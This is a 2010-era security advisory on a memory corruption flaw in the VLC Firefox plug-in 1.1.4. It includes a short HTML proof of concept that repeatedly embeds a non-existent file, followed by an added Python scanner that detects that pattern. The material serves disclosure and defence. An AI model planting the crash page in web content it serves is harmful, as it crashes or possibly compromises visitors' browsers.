-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

==================================================================================
==================================================================================
 VLC Multimedia Firefox Plug-in 1.1.4 non-existent file memory corruption

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.altervista.org/

 This was written for educational purposes. Use it at your own risk.
 The author will not be responsible for any damage.

 Tested on:
 Windows 7 Professional, fully patched, against Firefox 3.6.10
==================================================================================
==================================================================================
 DESCRIPTION:
 
 VLC Media Player offers a plug-in for Firefox to play embedded video/audio
 files.
 Passing a non-existent file to the "src" parameter (independently of the
 file extension) causes a memory corruption which could lead to arbitrary
 code execution.
==================================================================================
==================================================================================
 PROOF OF CONCEPT:

 <html>  
   <body onload="setTimeout('location.reload()', 100);">
     <embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
   </body>
 </html>

==================================================================================
==================================================================================
 SOLUTION:
 Disable the plug-in.
==================================================================================
==================================================================================

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
-----END PGP SIGNATURE-----
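
Added example, not part of the original advisory: a triage scanner for saved pages or proxy captures that reports any use of the VLC plug-in MIME type and whether the page reloads itself, the two traits visible in the proof of concept. Because the advisory says the file extension does not matter and a scanner cannot tell whether "src" exists, it flags every use of the plug-in rather than matching on file names; the names `VlcEmbedScanner` and `scan` and the sample pages are constructed for illustration.

```python
from html.parser import HTMLParser

VLC_MIME = "application/x-vlc-plugin"   # MIME type used in the advisory's PoC


class VlcEmbedScanner(HTMLParser):
    """Collects <embed>/<object> tags that invoke the VLC plug-in."""

    def __init__(self):
        super().__init__()
        self.embeds = []          # src/data values of VLC plug-in tags
        self.auto_reload = False  # page reloads itself without user action

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names.
        a = {k: (v or "") for k, v in attrs}
        if tag in ("embed", "object") and a.get("type", "").strip().lower() == VLC_MIME:
            self.embeds.append(a.get("src") or a.get("data") or "")
        # Self-reload as in the PoC: an onload handler calling location.reload
        if tag == "body" and "location.reload" in a.get("onload", ""):
            self.auto_reload = True
        # Same effect without script: <meta http-equiv="refresh">
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.auto_reload = True


def scan(html):
    """Return a finding dict, or None if the page does not use the plug-in."""
    parser = VlcEmbedScanner()
    parser.feed(html)
    parser.close()
    if not parser.embeds:
        return None
    return {"sources": parser.embeds, "auto_reload": parser.auto_reload}


# Constructed samples (not captured traffic)
SAMPLE_POC_LIKE = """<html><body onload="setTimeout('location.reload()', 100);">
<embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
</body></html>"""
SAMPLE_BENIGN = '<html><body><video src="clip.webm"></video></body></html>'

if __name__ == "__main__":
    for name, doc in (("poc-like", SAMPLE_POC_LIKE), ("benign", SAMPLE_BENIGN)):
        print(name, scan(doc))
```

A finding with `auto_reload` set deserves a closer look first, since a legitimate media page rarely reloads itself while a plug-in is loading.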